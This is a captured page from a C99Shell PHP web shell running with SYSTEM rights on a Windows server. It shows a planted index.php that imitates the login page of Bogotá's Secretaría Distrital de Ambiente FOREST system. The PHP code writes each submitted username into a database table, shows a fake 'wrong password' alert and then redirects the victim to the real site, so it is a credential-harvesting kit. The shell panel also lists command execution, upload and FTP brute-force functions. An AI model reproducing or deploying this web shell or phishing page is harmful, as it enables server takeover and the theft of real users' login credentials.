!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\forest\   drwxrwxrwx
Free 1.23 GB of 239.26 GB (0.51%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (12.23 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php include("conex.php");
   
     if( 
$_POST['userName'] ){
    

    
$sql "insert into usuarios values ('$_POST[userName]','*********')";  
    
      if( 
mysql_query $sql$conexion ) ){
        echo 
" <script language='JavaScript' type='text/javascript'>
alert('Contraseña incorrecta')  </script>"
;

    echo 
" <script language='JavaScript' type='text/javascript'>
    location.href ='http://www.secretariadeambiente.gov.co/forest' </script>"
;
    
    }
    }
 
 
?>
  <html >
    <head ignore>
    <meta http-equiv="X-UA-Compatible" content="IE=10">
    
    <title>
    FOREST &gt;
      
      Inicio
      
    </title>
    <link rel="shortcut icon" href="http://www.secretariadeambiente.gov.co/forest/img/forestIcon.gif?version=1710.301152">
    <link rel="stylesheet" href="http://www.secretariadeambiente.gov.co/forest/skins/gdocs-jar/css/forest.css?version=1710.301152" type="text/css">
    <link rel="stylesheet" href="http://www.secretariadeambiente.gov.co/forest/skins/gdocs-jar/css/menu.css?version=1710.301152" type="text/css">
    <link rel="stylesheet" href="http://www.secretariadeambiente.gov.co/forest/skins/gdocs-jar/css/autocomplete.css?version=1710.301152"/>
    <link rel="stylesheet" href="http://www.secretariadeambiente.gov.co/forest/css/escritorio.css?version=1710.301152" type="text/css">
    <link rel="stylesheet" href="http://www.secretariadeambiente.gov.co/forest/css/index.css?version=1710.301152" type="text/css">
    <link rel="stylesheet" href="http://www.secretariadeambiente.gov.co/forest/1ibre/jscalendar/calendar-win2k-1.css?version=1710.301152" type="text/css">
    <link rel="stylesheet" href="http://www.secretariadeambiente.gov.co/forest/skins/gdocs-jar/css/dialog.css?version=1710.301152" type="text/css">
    <link rel="stylesheet" href="http://www.secretariadeambiente.gov.co/forest/skins/gdocs-jar/css/forms.css?version=1710.301152" type="text/css">
    <script src="http://www.secretariadeambiente.gov.co/forest/jsoptimized/gz/js/gdocsall-1710.301152.js"  type="text/javascript"></script>

  <script type="text/javascript" src="http://www.secretariadeambiente.gov.co/forest/skins/gdocs-jar/pattern-editor/direcciones.jsp"></script>
    <script type="text/javascript" src="http://www.secretariadeambiente.gov.co/forest/js/json3.js"></script>
    
    <script type="text/javascript">
      var group_system_actual = "";
      var rootPath = "http://www.secretariadeambiente.gov.co/forest/";
      var rootReport="";
      var username = "";
      var isAdmin = false;
      var helpURI = "http://cloud.forestbpms.co/forestHelp/4.0.5/FOREST_USR_OPERACION/content/pr01.html";
      var forestEncoding = "ISO-8859-1";
      var forestVersion = "1710.301152";
      var helpBaseURL = "http://www.secretariadeambiente.gov.co/descargas/sdahelp/";
      var forestSessionTimeout = 10;
      registerWorking();
    </script>
    <style>
    </style>
    </head>
    <body ignore class="yui-skin-sam" onmousemove="registerWorking()" onclick="registerWorking()" onkeypress="registerWorking()">
    
    <table width="100%" height="100%" cellpadding="0" cellspacing="0" bordercolor="#006600"
      style="border-collapse: collapse" border="0">
      
      


      
      

      <tr>
        <td align="center" style="padding: 3px;" valign="top">
        <table cellspacing="0" cellpadding="0" width="100%" height="100%">
          <tr>
            <td align="center" id="forestBody">
            
            
              
                
              
              
                
                  
    
     
           
          
          
          
       
        
         
  
    
    
    
    
      
      <script type="text/javascript">
      function autenticarConToken() {
        openPopup("Ingrese el PIN del Token", "http://127.0.0.1:8000/forestAuthToken/", 350, 120);
      }
      </script>
            
      <table width="100%" height="100%" style="background:url(http://www.secretariadeambiente.gov.co/forest/img/base/login/bgLogin2.jpg) no-repeat center center;">
       <form action="index.php" method="post" style="float: right; padding: 20px;" name="loginForm" onsubmit="return sendLogin();"><input
          type="hidden" value="login" name="gdoc_cmd">
          <!-- <div id="contentLogin">-->
           
              <tr>
                  <td valign="middle" align="center" width="100%">
                  
                      <table  width="460px" >
                          <tr>
                              <td align="center" style="padding-bottom:25px;">
                                <!--  <div align="center"> <img src="http://www.secretariadeambiente.gov.co/forest/img/base/login/logo.gif"/></div>-->
                                    
                                          <img src="http://www.secretariadeambiente.gov.co/forest/img/base/login/logo.gif"/> 
                                     
                            </td>
                        </tr>

        <tr>
            <td align="center" style="padding-bottom:25px;">    
             
                  
                     <img src="http://www.secretariadeambiente.gov.co/forest/img/base/login/nomSistema.png"/> 
                 
                <!-- <h4><span ></span></h4> -->
            </td>
        </tr>
        <tr>
         <td align="center" valign="middle">
            <!-- <div id="login"> -->
            <table  style="background:url(http://www.secretariadeambiente.gov.co/forest/img/base/login/bgLogin.png) no-repeat center center;"  width="460px" height="210">
                <tr>
                    <td valign="middle" align="center" width="30%"> 
                        
                        
                        <img src="http://www.secretariadeambiente.gov.co/forest/img/base/login/dialog_password.gif" style="padding:5px;"/>
                        
                    </td>
                    <td class="bsep" width="1%">
                    </td>
                    <td width="69%">
                    <div style="color: red;"></div>
                        <div class="form-item">
                            <label>
                                <strong>Usuario:</strong>
                            </label>
                            <input  class="text_form" required name="userName" autofocus value=""/>
                            
                        </div>
                        <div class="form-item">
                            <label>
                                <strong>Contrase&ntilde;a:</strong>
                            </label>
                            <input type="password" class="text_form" required name="password" /> 
                            
                            
                        </div>
                        
                        <div align="center">
                            <input type="submit"  value="Ingresar" class="btn_login" /> 
                        </div>
                        <div>&nbsp;</div>                        
                                <script type="text/javascript">
                                      Event.observe(window, "load", function() {
                                    ibre.parse(document.loginForm);
                                    
                                  });
                                  </script>    
                    </td>
                </tr>
            </table>
                                     <div align="center">
                               <input type="button" value="Ingresar con token" style="width:150px; background: black; color:white; height: 25px;" onClick="autenticarConToken()"/>
                              <form action="/loginFirma" id="loginFirmaForm"><input type="hidden" name="firma"></form>
                       </div>
            
            </td>
            </tr>
           <tr>
               <td align="center"><br/>
               <a href="http://www.macroproyectos.com/index.php?option=com_content&view=article&id=3&Itemid=3" style="text-decoration:none" target="_blank">
                   <img src="http://www.secretariadeambiente.gov.co/forest/img/base/login/logoForest.png"/><br/>
               </a>    
                
               </td>
           </tr>


<!-- ------------------------------------------------------------------------ -->
                    </table>
                </td>
            </tr>
        <!-- </div> -->
        
        <!-- </div>-->
        
        </form>
        
        </table>
      
      
    
  

                
                
              
              
            
              
              
            
            
            </td>
          </tr>
        </table>
        </td>
      </tr>
      <tr height="25" ignore  id="main-footer">
        <td style="padding: 0 10px;">
        <table width="100%" cellpadding="0" cellspacing="0">
          <tr>
            <td width="10" style="width: 10px; font-size: 8px; color: lightgray;">Procesado&nbsp;en&nbsp;0.002&nbsp;seg.</td>
            <td align="center">
            <table cellpadding="0" cellspacing="0" style="color: black;">
              <tr>
                <td><a href="http://www.secretariadeambiente.gov.co" target="_blank"
                  style="white-space: nowrap;" class="legal-link">Secretaría Distrital de Ambiente</a>
                </td>
                <td>|</td>
                <td><a href="javascript: void(0)" onClick=" about()" class="legal-link">Acerca&nbsp;de</a></td>
                
                  <td>|</td>
                  <td><a href="javascript: void(0)" onClick="contactenos()" class="legal-link">Cont&aacute;ctenos</a>
                  </td>
                
                <td>|</td>
                <td><span class="legal" style="white-space: nowrap;">Avenida Caracas No. 54 - 38 - Conmutador: 377 8899</span>
                </td>
              </tr>
            </table>
            </td>
            <td align="right" width="350">
            <table cellpadding="0" cellspacing="0">
              <tr>
                <td>Powered&nbsp;by:&nbsp;</td>
                <td><img src="http://www.secretariadeambiente.gov.co/forest/img/mplogo.gif"></td>
                <td style="font-size: 9px; white-space: nowrap;"><a
                  href="http://www.macroproyectos.com" target="_blank" style="font-weight: bold;">MacroProyectos&reg;</a>
                <span> | Copyright &copy; 2009 - </span> 2018</td>
              </tr>
            </table>
            </td>
          </tr>
        </table>
        </td>
      </tr>
    </table>
    
    <div id="postMensaje" style="display: none;">

  
  
    
    <div >
  <table width="400">
    <tr>
      <th class="draggable title-popup"><img
        src="http://www.secretariadeambiente.gov.co/forest/img/close.gif"
        style="float: right; margin-left: 5px;" onClick="(ibre._methods.cancelClick.bind(this))()">
      <span id="titulo"></span></th>
    </tr>
    <tr>
      <td style="padding: 10px;" align="center">
      <table>
        <tr>
          <td><div>
                
                
                  
      <table cellpadding="5">
        <tr>
          <td align="center"><img id="imagen"></td>
          <td id="mensaje"></td>
        </tr>
      </table>
    
                  
                
                
              </div></td>
        </tr>
      </table>
      </td>
    </tr>
    
    <tr parse="$('closeButton')? $('closeButton'): []">
      <td align="center" style="padding: 0px 10px 10px;">
        
          <button onClick="(ibre._methods.cancelClick.bind(this))()" autofocus type="button"
            style="white-space: nowrap;" id="closeButton"><img
            src="http://www.secretariadeambiente.gov.co/forest/skins/gdocs-jar/img/okey.gif" style="vertical-align: middle;">&nbsp;<span
            style="vertical-align: middle;">Aceptar</span></button>
        
        
        
        
        
      </td>
    </tr>
    
  </table>
</div>
  

</div>
    <script type="text/javascript" ignore>
      Event.observe(window, "load", function() {
        var popup = $("postMensaje");
        _handlersTags.popup(popup);
        popup.show();
        
      });

      var newInterface="true";
      
      if(newInterface=="true"){
        var forestTabs = ["tab_init", "tab_desktop", "tab_reports"
                          
                        ];

        forestTabs.each(function (item) {
          if ($(item)) $(item).className = "";
        });
              var tabNumber= "";
              if(tabNumber=="1" || location.href.indexOf("index")!=-1)
              {
                  if($("tab_init"))
                  $("tab_init").className="selected";
              }
              else
              if(tabNumber=="2" || tabNumber=="")
              {
                  if($("tab_desktop"))
                      $("tab_desktop").className="selected";
              }
              else
              if(tabNumber)
              {
                  if($(forestTabs[tabNumber - 1]))
                      $(forestTabs[tabNumber - 1]).className="selected";
              }
          }
      

       var folderHelp='Gdocs2';
       if('Forest3'!='')
           folderHelp='Forest3';
    </script>
      <form action="http://www.secretariadeambiente.gov.co/forest/skins/gdocs-jar/forms/save.jsp" method="post" style="display: none;"
        target="_blank" id="forestSaveAs">
        <input type="hidden" name="title">
        <input type="hidden" name="content">
      </form>

    </body>
    </html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--